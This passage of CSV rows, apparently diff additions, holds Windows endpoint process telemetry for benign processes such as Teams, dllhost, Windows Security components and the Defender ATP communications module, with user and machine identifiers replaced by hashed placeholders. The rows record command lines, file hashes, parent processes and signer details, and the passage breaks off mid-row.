+269,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:56.650712900+00:00,18588,dllhost.exe,DllHost.exe /Processid:{45BA127D-10A8-46EA-8AB7-56EA9078943C},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:56.675312400+00:00,2021-06-25 02:10:57.048997400+00:00,bb8dc6ff-3aa3-43a6-a393-721d07ead0ef,computerpii_0a470890c60768167990033d701e7bd881398861,185131,False,10.7740.19041.1052,False,11540474045136908,,11540474045178995,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+270,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:56.770038700+00:00,14396,SecHealthUI.exe,"""SecHealthUI.exe"" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca",PortableExecutable,2021-03-11 01:06:47.337101600+00:00,C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe,5215232,03a33a07964d6f6eaf43d781a4508da6,560a369c5b37bf9644da6425116341a3969bdbaffc7bf98a2b847404740a432f,a5142c9f8b7a3062341addd2661a62c8f6014cf1,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:56.809536900+00:00,2021-06-25 02:10:57.049203700+00:00,be9b1d3a-6f9f-414b-8bf7-b99585739fb2,computerpii_0a470890c60768167990033d701e7bd881398861,185133,False,10.7740.19041.1052,False,11540474045136908,,11540474045178996,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,SecHealthUI,SecHealthUI.exe,Windows Defender application
+271,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:57.079589+00:00,18892,SecurityHealthHost.exe,SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding,PortableExecutable,2021-05-12 01:12:35.767997400+00:00,C:\Windows\System32\SecurityHealthHost.exe,98120,76a2df6d331bca4a01715c369ab81603,4a56edeb0f1b6ede1d1b292dad034757da7f481435ae12c50482086d82a78904,89fb1c4fb8f0b648acccd946798647f7b2a84aeb,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:57.658619100+00:00,2021-06-25 02:10:57.049633500+00:00,b22e14b5-7d90-42f1-9a2e-737dbc8ded28,computerpii_0a470890c60768167990033d701e7bd881398861,185137,False,10.7740.19041.1052,False,11540474045136908,,11540474045178997,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.1907.16384,SecurityHealthHost,SecurityHealthHost.exe,Windows Security Health Host
+272,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:35:20.299621+00:00,15944,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:35:20.314971200+00:00,2021-06-24 11:36:32.774207300+00:00,f024d811-949e-487d-a505-995e62f2e267,computerpii_0a470890c60768167990033d701e7bd881398861,180176,False,10.7740.19041.1052,False,11540474045177893,,11540474045178043,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+273,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:35:53.915866900+00:00,18160,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:35:54.597747700+00:00,2021-06-24 11:36:32.774506300+00:00,ad3d8b36-bc10-4d5c-a58f-e1589455645f,computerpii_0a470890c60768167990033d701e7bd881398861,180180,False,10.7740.19041.1052,False,11540474045177893,,11540474045178044,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+274,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:56:01.036866200+00:00,17344,SenseCncProxy.exe,3944,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:56:01.201446600+00:00,2021-06-24 00:57:56.342890700+00:00,20702b82-ff72-420f-bcb8-29b53faf62cb,computerpii_0a470890c60768167990033d701e7bd881398861,169366,False,10.7740.19041.1052,False,11540474045137006,,11540474045175357,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,16512,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+275,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:56:47.448492700+00:00,1536,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:56:48.446875500+00:00,2021-06-24 00:57:56.345331700+00:00,ded493eb-74da-417b-80ac-c8bd6acceac5,computerpii_0a470890c60768167990033d701e7bd881398861,169400,False,10.7740.19041.1052,False,11540474045175219,,11540474045175359,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+276,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:57:29.224738100+00:00,19840,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320741_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320741 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:57:29.357564100+00:00,2021-06-24 00:57:56.346771100+00:00,ad7e7040-c66d-4d38-ac16-dda1f1f1ebe9,computerpii_0a470890c60768167990033d701e7bd881398861,169423,False,10.7740.19041.1052,False,11540474045144190,,11540474045175364,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+277,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:31.533187500+00:00,12312,SenseCncProxy.exe,4880,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:31.896226300+00:00,2021-06-23 00:54:55.390672900+00:00,593afb18-afb2-4365-8fef-f7122ba7f2ff,computerpii_0a470890c60768167990033d701e7bd881398861,155297,False,10.7740.19041.1052,False,11540474045137006,,11540474045171919,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,18688,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+278,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:40.959515900+00:00,15448,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADoAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=2732 /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:41.521668+00:00,2021-06-23 00:54:55.390850200+00:00,0ab7d81c-2f84-4468-a8d7-6d1e1bdec718,computerpii_0a470890c60768167990033d701e7bd881398861,155301,False,10.7740.19041.1052,False,11540474045171817,,11540474045171920,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,18560,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft 